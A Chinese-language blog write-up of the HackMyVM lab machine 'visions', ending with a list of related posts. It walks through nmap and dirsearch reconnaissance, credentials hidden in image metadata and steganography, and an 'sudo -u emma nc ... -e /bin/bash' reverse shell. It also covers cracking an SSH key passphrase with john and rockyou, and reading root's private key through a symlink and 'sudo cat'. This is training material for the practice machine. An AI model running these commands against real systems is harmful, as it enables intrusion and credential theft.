HackMyvm靶机系列(3)-visions
一、信息收集
先探测网段,得到目标主机
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
然后进行端口扫描,发现ssh服务和http服务
nmap -sC -sV -p- 192.168.200.234
访问一下http服务,发现只有一张图片和一段注释。
这段注释看上去是一个提示,aliccia猜测可能是一个用户
使用dirsearch扫描一下目录,看看能有什么收获不
dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502
然而什么东西都么有
根据它的提示,将图片下载下来,查看一下图片的元数据是啥
curl http://192.168.200.234/white.png -o white.png./exiftool white.png
如图,发现了密码
工具用法与下载:
ExifTool完全入门指南
alicia:ihaveadream
二、漏洞利用
成功登入
进来之后在当前目录下没发现flag,看了一下家目录发现有4个用户,然后在sophia目录下发现了flag,但是没有权限,运行不了。
那就先试试提权?
sudo -l
发现当前用户可以以emma用户的身份运行nc而不需要使用密码。
既然如此,那就先反弹shell试试。
kali上监听端口
然后在目标机上执行下面命语句
sudo -u emma nc 192.168.200.192 10000 -e /bin/bash
成功接受到shell,使用python获得一个交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
在当前目录下发现一个note.txt文件,内容如下。
我情不自禁???不知道啥意思。
然后我又查看了一下suid和sudo提权,都没啥突破口。
后来看了大佬的wp,发现需要使用到一些图片处理工具
StegOnline
上传图片后,点击这个箭头处。
然后就能看到用户名和密码了,这题是真的坑,信息全藏在这张图片里了
sophia:seemstobeimpossible
登录成功
当前用户可以使用任何用户的身份使用cat命令查看.invisible文件。这意味着我们使用cat命令查看该文件的时候可以用拥有root权限。
打开一看,是用户isabella的私钥欸,拿去登录试试
居然还要继续输入密码。
只能开始爆破了
可以使用john the ripper进行爆破,但是要先使用下面命令将id_rsa转换为john能识别的hash值
python3 /usr/share/john/ssh2john.py id_rsa > crack.txt
我这里使用脚本进行爆破。
rockyou.txt是kali自带的一个字典,/usr/share/wordlists/rockyou.txt.gz,使用之前需要对其解压,不然会乱码
gzip -d rockyou.txt.gz
成功爆破出密码(密码在1万多行,但是这里由于写wp我就把它放前面来了)
invisible
如图,登录成功
从下面开始,由于换了一个网络,所以这个IP变了
三、权限提升
在这里看看有没有可以用来提权的命令
然而并没有什么突破点
后来突然想起之前sophia用户使用cat命令读取.invisible文件是具有root权限的,那我能不能使用isabella用户将.invisiblla用户链接到root用户的私钥上去呢?
创建软链接
ln -sf /root/.ssh/id_rsa .invisible
读取root用户的私钥
sudo cat /home/isabella/.invisible
这里使用私钥登录是会有一个小问题,权限太高会导致登陆失败。
将权限降低,再进行登录
chmod 600 key
登录成功,获得root权限
HackMyvm靶机系列(3)-visions相关推荐
- DC靶机系列:DC-6
一.信息收集 查询本机ip及目标靶机ip 本机ip:192.168.56.104,靶机ip通过nmap或arp-scan -l查看 靶机ip:192.168.56.115 收集靶机开放端口 输入nma ...
- 【Vulnhub靶机系列】DC3
基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp‐scan ‐‐interface ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- VulnHub靶机系列:Os-ByteSec
一 前言 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行.每个镜像 ...
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...
- 靶机系列-----medium_socnet
声明 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关. 靶机地址: https://www.vulnhub.com/entry/boredhackerblog-soci ...
- DC靶机系列------6
进行信息收集 对目标进行ip扫描 arp-scan –interface eth0 192.168.1.0/24 进行目标的访问: 发现输入IP之后会跳到wordy,在本地和kali中的host文件中 ...
- 渗透测试学习之靶机DC-6
1.下载靶机 本篇文章是DC靶机系列的第6篇,针对的是靶机DC-6,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章. DC-6的下载地址为DC: 6 ~ VulnHub.下载后解压为. ...
最新文章
- 查询linux kafka安装目录,Linux下安装并(单节点)配置启动Kafka
- anaconda3下opencv安装
- 百度地图 js 在安卓端手指缩放无效_利用百度地图绘制3D轨迹演示
- 初识Lucene.net
- 计算机一级ie浏览器和电子邮件,2016年职称计算机考试Internet基础知识:利用IE收发电子邮件...
- C#字符串的基本操作
- layout_gravity与gravity的区别
- Centos之故障排除
- 【技巧】Windows 10系统连接共享打印机报错0x00000709、0x0000007c、0x0000011b
- CATIA 安装Service Pack 时出错 检查完整性失败
- 北京二手房价预测(数据分析)
- ECharts数据可视化饼状图(环形图-进度半圆形)
- 机器学习系列文章-决策树
- android app数据电脑,Android APP连接电脑数据库(以SQL Server为例)
- TDM与FDM的比较
- ICMP目的网络,主机,协议,端口不可达报文的Type值,Code值分别是
- java 执行Linux命令并打印执行结果
- record java_Java Record类代码示例
- 前端测试框架Jest——语法篇
- 语音信号的同态处理、倒谱分析和Mel频率倒谱系数